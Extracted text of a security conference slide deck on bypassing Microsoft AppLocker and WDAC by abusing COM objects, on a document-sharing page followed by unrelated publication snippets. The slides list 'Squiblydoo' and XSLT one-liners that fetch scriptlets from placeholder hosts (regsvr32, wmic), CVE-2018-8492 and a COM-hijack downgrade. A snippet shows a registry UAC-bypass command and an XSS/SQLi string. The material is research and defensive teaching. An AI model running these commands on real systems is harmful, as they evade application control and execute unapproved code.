DOCSLIB.ORG

Com Under the Radar

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Com Under the Radar CIRCUMVENTING APPLICATION COM UNDER CONTROL SOLUTIONS THE RADAR Figure: Game Icons [1] > Whoami ◦ Jimmy Bayne | @bohops ◦ Security Assessor & Researcher @ByLightLLC ◦ From Baltimore, MD area ◦ Towson University Alum ◦ First BSides Talk ◦ Community Projects ◦ Blog | bohops.com ◦ LOLBAS | lolbas-project.github.io Figure: Global Dispatch [2] > Agenda ◦ COM Overview ◦ Application Control Overview ◦ Application Control Bypasses ◦ Defensive Considerations …ready…set…go! > COM Overview What is COM? ◦ COM = Component Object Model ◦ A binary interface for software interoperability ◦ Facilitates function calls between components (Middleware) [1] ◦ Technologies – DCOM, OLE, Automation, ActiveX Controls, etc. Terminology ◦ Interface: A definition for exposing COM functionality, including methods and properties ◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2] ◦ Object (Component): An instance of a COM class ◦ Instantiation: The creation or activation of an object (instance) [1] https://www.cs.umd.edu/~pugh/com/ [2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids > COM Overview Registered COM ◦ Registry keys direct the activation of COM objects ◦ COM class data is located in the HKCR Registry hive ◦ The data is merged from the \Software\Classes keys of the HKLM and HKCU hives ◦ Key Values in HKCU take precedence over values in HKLM ◦ Notable key structure in HKCR\CLSID\ ◦ CLSID – Class Identifier ({GUID} Format) ◦ InprocServer32 – In Process Server COM Server Implementation (DLL, OCX) ◦ LocalServer32 – Out-of-Process COM Server Implementation (EXE) ◦ ProgID/VersionIndependentProgID – COM class object friendly name *Note: There are other interesting keys as well > COM Overview Registered COM COM Class ID {CLSID} COM Server In Process Server Binary Path COM Object Programmatic Friendly Name Identifiers > COM Overview COM Example: COM Object Instantiation “Version Independent” ProgID Friendly Name Interface ID (IID) [IWshShell3 Interface] IWshShell3 Interface Methods & Properties Exec Method Call > COM Overview COM Abuse Vectors ◦ Active Scripting ◦ Script Engines (Languages) – Jscript, VBScript ◦ Script Hosts – (Signed) Binaries that execute script code ◦ ‘Facilitators’ – (Signed) Binaries that ‘enable’ script host-code execution (e.g. lolbins) ◦ PowerShell • COM Functionality • Registration • Resolution • Features/Capabilities > COM Resources James Forshaw (@tiraniddo) Matt Nelson (@enigma0x3) Rob Maslen (@rbmaslen) Casey Smith (@subTee) https://www.youtube.com/watch?v=dfMuzAZRGm4 https://www.youtube.com/watch?v=3gz1QmiMhss https://www.youtube.com/watch?v=xmbjRP5W-yk Source: Natty Boh Gear [5] > Application Control Overview Application Control is the practice of restricting unauthorized code execution Approaches ◦ Whitelists ◦ Blocklists ◦ Hybrid Application Control ≈ Application Whitelisting (AWL) Two major Microsoft solutions ◦ AppLocker ◦ WDAC (Device Guard) Figure: Wikipedia [4] > AppLocker ◦ Available since Windows 2008 Server & Windows 7 Enterprise ◦ Configured through Group Policy ◦ Supported Modes: Enforcement & Audit ◦ Rule Collections: Executable, Installer, Scripts, Packages, DLLs ◦ Rule Conditions: File Hash, Path, & Publisher ◦ Default Rules - Enforced Configuration ◦ Built-In option for setting baseline rule set ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [-] Not code integrity aware ◦ [-] Not considered a security boundary ◦ [+] Less overhead to implement > WDAC ◦ Available since Windows 2016 Server & Windows 10 Enterprise ◦ Configured through PowerShell cmdlets ◦ Supported Modes: Enforcement & Audit ◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc. ◦ Default Rules - Enforced Configuration ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [+] Code integrity aware (UMCI) ◦ [+] Considered a security boundary ◦ [-] More administrative overhead (maybe…) > PowerShell ◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs) ◦ COM object support (e.g. new-object cmdlet) ◦ Great for Dev/IT Management ◦ (Not so) Great for hackers and Red Teams ◦ PowerShell Version 5(.1) Enhancements ◦ Detection optics (when enabled) ◦ Script block logging, module logging, and transcription ◦ Constrained Language Mode (CLM) support ◦ Restricts sensitive language elements Source: Wiki Media [6] ◦ Not a security boundary ◦ “Implementation” determines effectiveness > COM: Circumventing AppLocker ◦ Default Rules ◦ Gaps in Path rules allow for the execution of any script or executable ◦ Unprivileged users can “write to” interesting paths Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0 > COM: Circumventing AppLocker ◦ 50 Shades of Squiblydoo ◦ Most variants abuse COM/DLL Registration ◦ Leverages scriptlet component files (.sct) and the script(let) run-time component (scrobj.dll) ◦ Component files can create objects and run unsigned script code Scriptlet Component File (“sct”) Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/RegSvr32.sct > COM: Circumventing AppLocker 50 Shades of Squiblydoo (Examples) ◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll ◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct ◦ cmstp.exe /s file.inf ◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1, ◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\path to file.inf Credits Casey Smith (@subTee) Matt Nelson (@enigma0x3) Nick Tyrer (@NickTyrer) Kyle Hanslovan (@KyleHanslovan) > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) ◦ Intended for transforming XML docs into other outputs ◦ Under the hood, variant technique abuses MSXML COM objects (interface methods and properties) ◦ XML Transform functions can execute embedded script code > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) wmic process get /format:”https://example.com/evil.xsl” http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html (Credit: Casey Smith - @subTee) > COM: Circumventing AppLocker PowerShell CLM ◦ CLM restricts unapproved script execution, cmdlets, arbitrary types, type definitions, etc. ◦ However, the new-object cmdlet can instantiate COM objects under AppLocker “enforcement” ◦ Example: PowerShell XML Stylesheet Transform > AppLocker Resources Adam Chester (@_xpn_) Oddvar Moe (@Oddvarmoe) https://blog.xpnsec.com/constrained-language-mode-bypass/ https://www.youtube.com/watch?v=zw21CbNeAjA > COM: Circumventing WDAC Windows Lockdown Policy (WLDP) • is activated when WDAC enforces a code integrity policy (UMCI = Enabled) • is included with “enlightened” script hosts and engines (as wldp.dll) • exports a function called WldpIsClassInApprovedList(), which is called to validate if a CLSID is safe • facilitates the instantiation of a COM (class) object if deemed safe Potential COM WDAC Bypass Conditions • Discovering script hosts that are not WLDP enlightened • Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code • Discovering script host/engine WLDP code implementation flaws for evading WldpIsClassInApprovedList() (e.g. false reliance/oversight) • Discovering ‘unsafe’ COM objects that are in the approved list • Re-introducing old code that is still trusted > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible: ◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting.. Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/ > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ A review of the exposed methods revealed various transform* functions > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM com object could no longer be used to execute scriptlet code under the WDAC policy ◦ Microsoft patched and released a new MSXML3.dll (the COM server) > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay ◦ For testing, a few versions of previous MSXML3.dll (and dependency) files were copied to the new WDAC test machine. ◦ Interestingly, a previous unpatched DLLs of the same Microsoft build series was still digitally signed > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ A deeper look into the signature properties confirmed that it was catalog signed as well as revealed the path of the catalog file > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ For testing, the COM Class Registry Keys from HKLM was exported to a .reg file for COM Key Hijacking ◦ Modifications were made for HKCU and the InprocServer32 path to point to the ‘legacy’ binary > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged with HKCR > COM: Circumventing WDAC AWL Bypass: Catalog Signature Hygiene ◦ Sure enough, a replay
Load more

Recommended publications
  • Unified, Easy-To-Manage Endpoint Security
    Unified, Easy-to-Manage Endpoint Security Microsoft® Forefront™ Protect Business Continuity with Improved Management Client Security protects of Endpoint Security laptops, desktops, and file The release of the next generation of on Windows firewall activities. The agent servers with integrated Forefront client security protects business incorporates proven technologies already protection against laptops, desktops, and file servers against in use on millions of computers worldwide malware. It simplifies viruses, spyware, rootkits, and other and is backed by efficient and effective control of endpoint malware. The solution includes: threat response from the Microsoft security and provides n A single agent that provides antivirus Malware Protection Center. better visibility into the and antispyware protection, vulnerability Forefront Client Security is designed to overall protection of the assessment and remediation, and host simplify administration and save valuable environment. Defenses firewall management. time through its single management are easily managed from n A central management server that console and policy configuration, the Microsoft Forefront enables administrators to configure, central update infrastructure, and Management Console update, and report on agent activity automated endpoint discovery. It also code-named “Stirling.” across the enterprise. integrates with existing investments in Microsoft technologies. The two components work together to www.microsoft.com/ provide unmatched visibility and control To reduce risk,
    [Show full text]
  • Attack Tactics 7! the Logs You Are Looking For
    Attack Tactics 7! The Logs You Are Looking For © Black Hills Information Security @BHInfoSecurity Brought To You By! © Black Hills Information Security| @BHInfoSecurity Brought To You By! Just type “‘Demo,<script>alert(document.cookie);</script> or ‘ 1=1;--” into the Questions box DEMO will work fine too…. © Black Hills Information Security| @BHInfoSecurity Brought To You By! https://www.blackhat.com/us-19/training/schedule/index.html#a-guide-to- active-defense-cyber-deception-and-hacking-back-14124 © Black Hills Information Security| @BHInfoSecurity © Black Hills Information Security| @BHInfoSecurity Problem Statement © Black Hills Information Security @BHInfoSecurity JPcert to the rescue… Sort of.. © Black Hills Information Security @BHInfoSecurity A helpful diagram Forensics Testing Defense © Black Hills Information Security @BHInfoSecurity Executive Problem Statement Basic Questions: ● Are our tools working? ● What can we detect? ● How can we test this? ● What are our gaps? ● What existing tools can fill them? ● What do we have to buy? ● Can we buy ourselves out of this problem? © Black Hills Information Security @BHInfoSecurity TryingA helpful to diagramtie it all together Forensics Testing Defense © Black Hills Information Security @BHInfoSecurity Adventures in (just enabling proper) Windows Event Logging Important Event IDs ● 4624 and 4634 (Logon / Logoff) ● 4662 (ACL’d object access - Audit req.) ● 4688 (process launch and usage) ● 4698 and 4702 (tasks + XML) ● 4740 and 4625 (Acct Lockout + Src IP) ● 5152, 5154, 5156, 5157 (FW
    [Show full text]
  • Impact 360 Content Producer Installation and Upgrade Guide 5
    Content Producer Installation and Upgrade Guide Version 11.1 Document Revision 1.00 Confidential and Proprietary Information of Verint Systems Inc. 11/540,185; US 11/540,320; US 11/540,900; US 11/540,902; © 1992–2012 Verint Systems Inc. All Rights Reserved Worldwide. US 11/567,808; US 11/567,852; US 11/583,381; US Confidential and Proprietary Information of Verint Systems Inc. 11/608,340; US 11/608,350; US 11/608,358; US 11/616,490; US 11/621,134; US 11/691,530; US 11/692,983; US All materials (regardless of form and including, without 11/693,828; US 11/693,923; US 11/693,933; US 11/712,933; US 11/723,010; US 11/742,733; US 11/752,458; US limitation, software applications, documentation, and any other 11/776,659; US 11/824,980; US 11/831,250; US 11/831,257; information relating to Verint Systems, its products or services) are the exclusive property of Verint Systems Inc. Only expressly US 11/831,260; US 11/831,634; US 11/844,759; US 11/872,575; US 11/924,201; US 11/937,553; US 11/959,650; authorized individuals under obligations of confidentiality are US 11/968,428; US 12/015,375; US 12/015,621; US permitted to review materials in this document. By reviewing these materials, you agree to not disclose these materials to any 12/053,788; US 12/055,102; US 12/057,442; US 12/057,476; US 12/107,976; US 12/118,789; US 12/118,792; US third party unless expressly authorized by Verint Systems, and 12/164,480; US 12/245,781; US 12/326,205; US 12/351,370; to protect the materials as confidential and trade secret information.
    [Show full text]
  • Teradici Remote Workstation Card Agent for Windows
    Teradici PCoIP Remote Workstation Card Agent for Windows Documentation Teradici PCoIP Remote Workstation Card Agent for Windows Documentation This documentation is intended for administrators who are installing the Remote Workstation Card Agent for Windows as part of a Teradici Remote Workstation Card system. It assumes thorough knowledge of conventions and networking concepts, including firewall configuration. Although many agent features and settings can be configured using the Windows user interface, some administrative tasks require use of Windows command line tools. Users should be familiar with both cmd and PowerShell. About the PCoIP Remote Workstation Card Agent for Windows The PCoIP Remote Workstation Card Agent for Windows introduces Teradici brokering to a Teradici Remote Workstation Card deployment, allowing the desktop to be managed by Teradici Cloud Access Manager or by third-party brokers like Leostream. A complete PCoIP Remote Workstation Card deployment includes these components: • A physical host machine, which provides the desktop to remote clients. See System Requirements for more information. • A PCoIP Remote Workstation Card installed on the host machine. • The PCoIP Remote Workstation Card software for Windows installed on the host machine. • The Remote Workstation Card Agent for Windows installed on the host machine. About PCoIP Licensing When the Remote Workstation Card Agent for Windows is installed, the Remote Workstation Card can be licensed using a Remote Workstation Card license. With this flexibility, you can
    [Show full text]
  • User Manual TREK-722/723
    User Manual TREK-722/723 RISC All-In-One Mobile Data Terminal Copyright The documentation and the software included with this product are copyrighted 2012 by Advantech Co., Ltd. All rights are reserved. Advantech Co., Ltd. reserves the right to make improvements in the products described in this manual at any time without notice. No part of this manual may be reproduced, copied, translated or transmitted in any form or by any means without the prior written permission of Advantech Co., Ltd. Information provided in this manual is intended to be accurate and reliable. How- ever, Advantech Co., Ltd. assumes no responsibility for its use, nor for any infringe- ments of the rights of third parties, which may result from its use. Acknowledgements TI and AM37x are trademarks of Texas Instruments.. Microsoft Windows is registered trademarks of Microsoft Corp. All other product names or trademarks are properties of their respective owners. Product Warranty (2 years) Advantech warrants to you, the original purchaser, that each of its products will be free from defects in materials and workmanship for two years from the date of pur- chase. This warranty does not apply to any products which have been repaired or altered by persons other than repair personnel authorized by Advantech, or which have been subject to misuse, abuse, accident or improper installation. Advantech assumes no liability under the terms of this warranty as a consequence of such events. Because of Advantech’s high quality-control standards and rigorous testing, most of our customers never need to use our repair service. If an Advantech product is defec- tive, it will be repaired or replaced at no charge during the warranty period.
    [Show full text]
  • Accessdata Forensic Bootcamp
    Windows Forensics—Vista Forensic Toolkit, FTK Imager and Registry Viewer Advanced • One-day Instructor-led Workshop his one-day AccessData® workshop follows up on the AccessData T Windows® Forensic Training by covering the Microsoft® Windows Vista operating system. It provides the knowledge and skills necessary to use AccessData tools to conduct forensic investigations on Vista systems. Participants learn where and how to locate Vista system artifacts using AccessData Forensic Toolkit® (FTK®), FTK Imager, Registry Viewer®, and Password Recovery Toolkit® (PRTK®). During this one-day workshop, participants will review the following: GUID Partition Tables (GPT): Students will use FTK Imager to navigate the new GPT formatted drive partitioning scheme. File Structure Changes: Students will learn the mechanics of reparse and mount points in the Windows Vista file structure. BitLocker Full Volume Encryption (FVE): Students will use FTK Imager and Windows Vista technology to decrypt and acquire a sector-by-sector image of an FVE drive. Windows Vista feature changes such as: - Recycle Bin - Structure and Content Changes - Thumbcache - Reparse Points - Link and Spool Files - Vista File Structure - Windows Event Logs - Vista Registry Entries, PSSP, and IntelliForms data - Updated SuperFetch Structure - New Locations for Old Windows Artifacts - Enhanced Thumbs.db Functionality - Device Identification and Protection - Vista security model The class includes multiple hands-on labs that allow students to apply what they have learned in each module.
    [Show full text]
  • HTTP Client API for Jscript
    HTTP Client API for JScript Version 9.7 April 2015 This document applies to HTTP Client API for JScript Version 9.7. Specifications contained herein are subject to change and these changes will be reported in subsequent release notes or new editions. Copyright © 1999-2015 Software AG, Darmstadt, Germany and/or Software AG USA, Inc., Reston, VA, USA, and/or its subsidiaries and/or its affiliates and/or their licensors. The name Software AG and all Software AG product names are either trademarks or registered trademarks of Software AG and/or Software AG USA, Inc. and/or its subsidiaries and/or its affiliates and/or their licensors. Other company and product names mentioned herein may be trademarks of their respective owners. Detailed information on trademarks and patents owned by Software AG and/or its subsidiaries is located at http://softwareag.com/licenses. Use of this software is subject to adherence to Software AG's licensing conditions and terms. These terms are part of the product documentation, located at http://softwareag.com/licenses/ and/or in the root installation directory of the licensed product(s). This software may include portions of third-party products. For third-party copyright notices, license terms, additional rights or re- strictions, please refer to "License Texts, Copyright Notices and Disclaimers of Third-Party Products". For certain specific third-party license restrictions, please refer to section E of the Legal Notices available under "License Terms and Conditions for Use of Software AG Products / Copyright and Trademark Notices of Software AG Products". These documents are part of the product documentation, located at http://softwareag.com/licenses and/or in the root installation directory of the licensed product(s).
    [Show full text]
  • Red Teaming for Blue Teamers: a Practical Approach Using Open Source Tools
    SESSION ID: LAB4-W10 Red Teaming for Blue Teamers: A Practical Approach Using Open Source Tools Travis Smith Manager, Security Content and Research Tripwire, Inc @MrTrav #RSAC #RSAC Agenda 14:00-14:10 – Access Learning Lab Virtual Environment 14:10-15:00 – Run Through Red Team Activities 15:00-16:00 – Run Through Blue Team Activities #RSAC Accessing the Lab https://tripwire.me/vhX X will be you’re specific student number on your desk Password: rsalearninglab OS Credentials: rsa/learninglab OS Hostname: host-X OS IP Address: 10.0.0.X 3 #RSAC Log Into SkyTap https://tripwire.me/vh1 rsalearninglab #RSAC Launch Victim Host Console Username: rsa Password: learninglab #RSAC #RSAC Today’s Red Team Toolset #RSAC Today’s Blue Team Toolset Elastic Stack Windows Sysmon Kibana Beats Elasticsearch @SwiftOnSecurity #RSAC Disable Windows Defender* Start Menu > Settings > Update & Security Click Windows Security on left side menu Click Virus & threat protection Click Manage settings Turn Off: – Real-time protection – Cloud-delivered protection #RSAC Red Team Exercise #1 https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1088/T1088.md #RSAC Red Team Exercise #1 Launch Event Viewer, confirm it launches #RSAC Red Team Exercise #1 Run atomic command – reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ”C:\Windows\System32\cmd.exe” /f #RSAC Red Team Exercise #1 Launch Event Viewer, confirm CMD.exe launches Launch other executables from here: • notepad • calc • whoami • ping #RSAC Red Team Exercise #2 https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1015/T1015.md
    [Show full text]
  • LIFENET® AED Event Viewer
    LIFENET ® AED Event Viewer User guide Contents Overview ..................................................................................................................2 What is LIFENET AED Event Viewer? ..........................................................................................2 How does it work? ..........................................................................................................................2 What can I do with it? ....................................................................................................................2 Before you start ....................................................................................................2 Use cases .........................................................................................................................................2 IT requirements ..............................................................................................................................2 Getting started ........................................................................................................2 Starting LIFENET AED Event Viewer ...........................................................................................2 Calibrating the screen .....................................................................................................................3 Working with LIFENET AED Event Viewer ........................................................3 Receiving cases ...............................................................................................................................3
    [Show full text]
  • Event Log Explorer Help
    Welcome to Event Log Explorer Help This help system is a place to find information about Event Log Explorer. Introduction Concept Event Log Explorer basics License agreement © 2005-2018 FSPro Labs. All rights reserved. Introduction Event Log Explorer is a software for viewing, monitoring and analyzing events recorded in Security, System, Application and other logs of Microsoft Windows operating systems. It extends standard Event Viewer monitoring functionality and brings new features. Main features of Event Log Explorer: Multiple-document or tabbed-document user interface depending on user preferences Favorites computers and their logs are grouped into a tree Viewing event logs and event logs files Merging different event logs into one view Archiving event logs Event descriptions and binary data are in the log window Event list can be sorted by any column and in any direction Advanced filtering by any criteria including event description text Quick Filter feature allows you to filter event log in a couple of mouse clicks Log loading options to pre-filter event logs Switching between disk and memory for temporary data storing Fast search by any criteria Fast navigation with bookmarks Compatibility with well-known event knowledgebases Sending event logs to printer Export log to different formats Multiple-document or tabbed-document user interface depending on user preferences Event Log Explorer provides you with 2 user interface types. Multiple- document interface (MDI) allows you to open unlimited number of event logs and place them all inside the main window of Event Log Explorer. Tabbed-document interface (TDI) allows you to open unlimited number of event logs and features the best way of navigation between logs.
    [Show full text]
  • INFORMATION TECHNOLOGY CONCEPTS-OPEN - REGIONAL 2019 Page 1 of 8
    INFORMATION TECHNOLOGY CONCEPTS-OPEN - REGIONAL 2019 Page 1 of 8 INFORMATION TECHNOLOGY CONCEPTS (391) —OPEN EVENT— REGIONAL – 2019 DO NOT WRITE ON TEST BOOKLET TOTAL POINTS _________ (100 points) Failure to adhere to any of the following rules will result in disqualification: 1. Contestant must hand in this test booklet and all printouts. Failure to do so will result in disqualification. 2. No equipment, supplies, or materials other than those specified for this event are allowed in the testing area. No previous BPA tests and/or sample tests or facsimile (handwritten, photocopied, or keyed) are allowed in the testing area. 3. Electronic devices will be monitored according to ACT standards. No more than sixty (60) minutes testing time Property of Business Professionals of America. May be reproduced only for use in the Business Professionals of America Workplace Skills Assessment Program competition. INFORMATION TECHNOLOGY CONCEPTS-OPEN - REGIONAL 2019 Page 2 of 8 MULTIPLE CHOICE Identify the choice that best completes the statement or answers the question. Mark A if the statement is true. Mark B if the statement is false. 1. Which of the following appears on the right side of any Windows 8 screen when you move your pointer to a right corner? A. Live tile B. Memory Manager C. Charms bar D. System tray 2. Which element of the Windows 7 GUI gives windows a glassy appearance, but also consumes more hardware resources? A. Control panel B. Aero user interface C. Charms interface D. Logic interface 3. The top of a top-down hierarchical structure of subdirectories is called which of the following? A.
    [Show full text]
  • ANSYS, Inc. Installation Guide for Windows
    Installation Guide for Windows ANSYS, Inc. Release 16.2 Southpointe July 2015 2600 ANSYS Drive ANSYS, Inc. is Canonsburg, PA 15317 certified to ISO [email protected] 9001:2008. http://www.ansys.com (T) 724-746-3304 (F) 724-514-9494 Revision Information The information in this guide applies to all ANSYS, Inc. products released on or after this date, until superseded by a newer version of this guide. This guide replaces individual product installation guides from previous releases. Copyright and Trademark Information © 2015 SAS IP, Inc. All rights reserved. Unauthorized use, distribution or duplication is prohibited. ANSYS, ANSYS Workbench, Ansoft, AUTODYN, EKM, Engineering Knowledge Manager, CFX, FLUENT, HFSS, AIM and any and all ANSYS, Inc. brand, product, service and feature names, logos and slogans are registered trademarks or trademarks of ANSYS, Inc. or its subsidiaries in the United States or other countries. ICEM CFD is a trademark used by ANSYS, Inc. under license. CFX is a trademark of Sony Corporation in Japan. All other brand, product, service and feature names or trademarks are the property of their respective owners. Disclaimer Notice THIS ANSYS SOFTWARE PRODUCT AND PROGRAM DOCUMENTATION INCLUDE TRADE SECRETS AND ARE CONFID- ENTIAL AND PROPRIETARY PRODUCTS OF ANSYS, INC., ITS SUBSIDIARIES, OR LICENSORS. The software products and documentation are furnished by ANSYS, Inc., its subsidiaries, or affiliates under a software license agreement that contains provisions concerning non-disclosure, copying, length and nature of use, compliance with exporting laws, warranties, disclaimers, limitations of liability, and remedies, and other provisions. The software products and documentation may be used, disclosed, transferred, or copied only in accordance with the terms and conditions of that software license agreement.
    [Show full text]